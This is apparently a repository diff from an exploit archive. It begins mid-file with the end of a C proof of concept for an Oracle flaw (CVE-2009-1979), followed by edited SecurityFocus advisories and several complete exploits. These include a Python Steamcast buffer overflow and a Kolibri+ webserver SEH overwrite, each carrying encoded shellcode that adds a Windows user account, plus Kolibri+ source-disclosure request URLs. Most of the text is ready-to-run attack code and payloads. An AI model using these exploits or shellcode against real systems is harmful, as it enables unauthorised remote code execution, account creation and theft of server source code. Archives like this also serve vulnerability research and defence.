"\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09"
"\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00"
"\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64"
"\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
"\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41"
"\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00"
"\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49"
"\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00"
"\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49"
"\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52"
"\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61"
"\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00"
"\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F"
"\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35"
"\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
"\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42"
"\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00"
"\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04"
"\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54"
"\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9"
"\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49"
"\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55"
"\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20"
"\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27"
"\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52"
"\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49"
"\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D"
"\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52"
"\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27"
"\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52"
"\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C"
"\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27"
"\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44"
"\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41"
"\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52"
"\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45"
"\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27"
"\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41"
"\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52"
"\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54"
"\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E"
"\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53"
"\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41"
"\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48"
"\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C"
"\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54"
"\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41"
"\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53"
"\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20"
"\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49"
"\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00"
"\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F"
"\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44"
"\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42"
"\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42"
"\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55"
"\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00"
"\x00\x00\x00\x00\x00\x00"
,1318);
pkt1318[0x41]=0x80;
s_send (s, pkt1318, 1318);
assert (closesocket (s)==0);
return true;
}
else
{
printf ("while connect(): select() returns zero\n");
assert (closesocket (s)==0);
return false;
};
};
void main(int argc, char * argv[])
{
printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n");
printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n");
if (argv[1]==NULL)
{
printf ("use: %s <hostname>\n", argv[0]);
return;
};
try_host (argv[1]);
};


@ -1,7 +1,7 @@
source: http://www.securityfocus.com/bid/1839/info
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS). This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
- The Agent services server on port 8100/tcp
- The End Entity services server on port 443/tcp (Accessible through SSL)


@ -1,7 +1,7 @@
source: http://www.securityfocus.com/bid/1839/info
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
Acquiring access to known files outside of the web root is possible through directory traversal techniques in Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
- The Agent services server on port 8100/tcp
- The End Entity services server on port 443/tcp (Accessible through SSL)


@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/31855/info
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Mozilla Firefox 3 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.


@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/31855/info
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Google Chrome 0.2.149 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.


@ -1,59 +1,59 @@
#!/usr/bin/python
#[*] Usage : steamcast.py [victime_ip]
#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p
#Short Description : The previous exploit runs small shellcodes only, this one is the opposite :)
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
#Other note : The shellcode will be executed when the program will be closed.
#Another one : When you have problems with running the exploit msg me before you msg str0ke.
import sys, socket
import struct
host = sys.argv[1]
port = 8000
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"
"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"
"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"
"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"
"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"
"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"
"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"
"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"
"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")
shellunt=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt
#It needs a loop to works
while 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
head = "GET / HTTP/1.1\r\n"
head += "Host: "+host+"\r\n"
head += exploit+"\r\n"
head += "\r\n\r\n"
s.send(head)
# milw0rm.com [2009-04-13]
#!/usr/bin/python
#[*] Usage : steamcast.py [victime_ip]
#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p
#Short Description : The previous exploit runs small shellcodes only, this one is the opposite :)
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
#Other note : The shellcode will be executed when the program will be closed.
#Another one : When you have problems with running the exploit msg me before you msg str0ke.
import sys, socket
import struct
host = sys.argv[1]
port = 8000
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"
"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"
"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"
"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"
"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"
"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"
"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"
"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"
"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")
shellunt=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt
#It needs a loop to works
while 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
head = "GET / HTTP/1.1\r\n"
head += "Host: "+host+"\r\n"
head += exploit+"\r\n"
head += "\r\n\r\n"
s.send(head)
# milw0rm.com [2009-04-13]


@ -1,21 +1,21 @@
#############################################################################################
#
# Name : Kolibri+ Webserver 2 , Remote file disclousure exploit
# Author : Skull-HacKeR
#
#############################################################################################
[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
[*] Attack type : Remote
[*] Exploitation
Exploit:
http://127.0.0.1/default.asp.
http://127.0.0.1/default.php.
# milw0rm.com [2009-09-11]
#############################################################################################
#
# Name : Kolibri+ Webserver 2 , Remote file disclousure exploit
# Author : Skull-HacKeR
#
#############################################################################################
[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
[*] Attack type : Remote
[*] Exploitation
Exploit:
http://127.0.0.1/default.asp.
http://127.0.0.1/default.php.
# milw0rm.com [2009-09-11]


@ -1,85 +1,85 @@
#!/usr/bin/python
#
# Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret
# to work correctly despite the large number of usable addresses that were tested.
#
# $ ./kolibri.py 192.168.1.146 8080
#
# [*] Kolibri+ Webserver 2 SEH Overwrite
# [*] Written by blake
# [*] Tested on Windows XP SP 1
# [*] Denial of Service found by Usman Saeed
#
# [+] Connecting to 192.168.1.146 on port 8080
# [+] Sending payload
# [+] Done. User jenny created with the password of pass on 192.168.1.146
import socket, sys
print "\n[*] Kolibri+ Webserver 2 SEH Overwrite"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP 1"
print "[*] Denial of Service found by Usman Saeed\n"
if len(sys.argv)!= 3:
print "[*] Usage: %s <ip> <port>"
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
# windows/adduser - 446 bytes Encoder: x86/alpha_mixed
# USER=jenny, EXITFUNC=seh, PASS=pass
shellcode = (
"\x89\xe6\xdb\xc8\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x4b\x58\x47\x34\x45\x50\x43\x30\x43\x30\x4c\x4b\x50"
"\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x43\x31\x4a\x4f"
"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31"
"\x49\x50\x4c\x59\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45\x57\x49"
"\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47\x4b"
"\x51\x44\x51\x34\x45\x54\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x46"
"\x44\x45\x51\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b"
"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45"
"\x51\x4a\x4b\x4b\x39\x51\x4c\x47\x54\x45\x54\x49\x53\x51\x4f"
"\x50\x31\x4a\x56\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46\x50"
"\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d"
"\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4c\x43\x49\x50\x42"
"\x4a\x50\x50\x45\x38\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x43\x58"
"\x4a\x38\x4b\x4e\x4c\x4a\x44\x4e\x46\x37\x4b\x4f\x4a\x47\x42"
"\x43\x42\x4d\x43\x54\x46\x4e\x43\x55\x43\x48\x43\x55\x51\x30"
"\x46\x4f\x42\x43\x51\x30\x42\x4e\x42\x45\x44\x34\x47\x50\x44"
"\x35\x42\x53\x45\x35\x43\x42\x51\x30\x43\x5a\x43\x55\x42\x4e"
"\x42\x4e\x43\x49\x47\x50\x42\x50\x43\x51\x43\x43\x43\x43\x51"
"\x30\x46\x4f\x51\x51\x51\x54\x51\x54\x51\x30\x51\x36\x47\x56"
"\x47\x50\x42\x4e\x45\x35\x44\x34\x47\x50\x42\x4c\x42\x4f\x43"
"\x53\x43\x51\x42\x4c\x43\x57\x42\x52\x42\x4f\x42\x55\x44\x30"
"\x51\x30\x51\x51\x45\x34\x42\x4d\x42\x49\x42\x4e\x45\x39\x44"
"\x33\x44\x34\x43\x42\x43\x51\x44\x34\x42\x4f\x42\x52\x43\x43"
"\x47\x50\x43\x5a\x45\x35\x42\x4e\x42\x4e\x43\x49\x51\x30\x46"
"\x4f\x47\x31\x51\x54\x47\x34\x43\x30\x41\x41")
payload = "\x41" * 8 # junk buffer
payload += "\x90" * 10 # nop sled
sc = shellcode # 446 bytes of shellcode
jump_near = "\xe9\x34\xfe\xff\xff" # jump near -460 bytes
next_seh = "\xeb\xf9\xff\xff" # short jump back -7 bytes
seh = "\x6f\x2a\xe6\x77" # p/p/r from kernel32.dll
junk = "\x41" * 424 # junk buffer
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
print "[+] Sending payload"
s.send("GET /index.html" + payload + sc + jump_near + next_seh + seh + junk + " HTTP/1.0\r\n\r\n")
s.close()
print "[+] Done. User jenny created with the password of pass on %s\n" % host
except:
print "[x] Could not connect!"
# milw0rm.com [2009-09-11]
#!/usr/bin/python
#
# Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret
# to work correctly despite the large number of usable addresses that were tested.
#
# $ ./kolibri.py 192.168.1.146 8080
#
# [*] Kolibri+ Webserver 2 SEH Overwrite
# [*] Written by blake
# [*] Tested on Windows XP SP 1
# [*] Denial of Service found by Usman Saeed
#
# [+] Connecting to 192.168.1.146 on port 8080
# [+] Sending payload
# [+] Done. User jenny created with the password of pass on 192.168.1.146
import socket, sys
print "\n[*] Kolibri+ Webserver 2 SEH Overwrite"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP 1"
print "[*] Denial of Service found by Usman Saeed\n"
if len(sys.argv)!= 3:
print "[*] Usage: %s <ip> <port>"
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
# windows/adduser - 446 bytes Encoder: x86/alpha_mixed
# USER=jenny, EXITFUNC=seh, PASS=pass
shellcode = (
"\x89\xe6\xdb\xc8\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x4b\x58\x47\x34\x45\x50\x43\x30\x43\x30\x4c\x4b\x50"
"\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x43\x31\x4a\x4f"
"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31"
"\x49\x50\x4c\x59\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45\x57\x49"
"\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47\x4b"
"\x51\x44\x51\x34\x45\x54\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x46"
"\x44\x45\x51\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b"
"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45"
"\x51\x4a\x4b\x4b\x39\x51\x4c\x47\x54\x45\x54\x49\x53\x51\x4f"
"\x50\x31\x4a\x56\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46\x50"
"\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d"
"\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4c\x43\x49\x50\x42"
"\x4a\x50\x50\x45\x38\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x43\x58"
"\x4a\x38\x4b\x4e\x4c\x4a\x44\x4e\x46\x37\x4b\x4f\x4a\x47\x42"
"\x43\x42\x4d\x43\x54\x46\x4e\x43\x55\x43\x48\x43\x55\x51\x30"
"\x46\x4f\x42\x43\x51\x30\x42\x4e\x42\x45\x44\x34\x47\x50\x44"
"\x35\x42\x53\x45\x35\x43\x42\x51\x30\x43\x5a\x43\x55\x42\x4e"
"\x42\x4e\x43\x49\x47\x50\x42\x50\x43\x51\x43\x43\x43\x43\x51"
"\x30\x46\x4f\x51\x51\x51\x54\x51\x54\x51\x30\x51\x36\x47\x56"
"\x47\x50\x42\x4e\x45\x35\x44\x34\x47\x50\x42\x4c\x42\x4f\x43"
"\x53\x43\x51\x42\x4c\x43\x57\x42\x52\x42\x4f\x42\x55\x44\x30"
"\x51\x30\x51\x51\x45\x34\x42\x4d\x42\x49\x42\x4e\x45\x39\x44"
"\x33\x44\x34\x43\x42\x43\x51\x44\x34\x42\x4f\x42\x52\x43\x43"
"\x47\x50\x43\x5a\x45\x35\x42\x4e\x42\x4e\x43\x49\x51\x30\x46"
"\x4f\x47\x31\x51\x54\x47\x34\x43\x30\x41\x41")
payload = "\x41" * 8 # junk buffer
payload += "\x90" * 10 # nop sled
sc = shellcode # 446 bytes of shellcode
jump_near = "\xe9\x34\xfe\xff\xff" # jump near -460 bytes
next_seh = "\xeb\xf9\xff\xff" # short jump back -7 bytes
seh = "\x6f\x2a\xe6\x77" # p/p/r from kernel32.dll
junk = "\x41" * 424 # junk buffer
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
print "[+] Sending payload"
s.send("GET /index.html" + payload + sc + jump_near + next_seh + seh + junk + " HTTP/1.0\r\n\r\n")
s.close()
print "[+] Done. User jenny created with the password of pass on %s\n" % host
except:
print "[x] Could not connect!"
# milw0rm.com [2009-09-11]


@ -1,28 +1,28 @@
#################################################################################
# #
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #
# aka: More fun with Kolibri+ 2 webserver #
# Found By: Dr_IDE #
# Tested On: Windows XPSP3 #
# #
#################################################################################
- Description -
Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available.
This vulnerability is similar to the one reported earlier by Skull-HacKeR.
Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.
- Technical Details -
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/default.asp::$DATA
http://172.16.2.101/index.php::$DATA
# milw0rm.com [2009-09-11]
#################################################################################
# #
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #
# aka: More fun with Kolibri+ 2 webserver #
# Found By: Dr_IDE #
# Tested On: Windows XPSP3 #
# #
#################################################################################
- Description -
Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available.
This vulnerability is similar to the one reported earlier by Skull-HacKeR.
Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.
- Technical Details -
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/default.asp::$DATA
http://172.16.2.101/index.php::$DATA
# milw0rm.com [2009-09-11]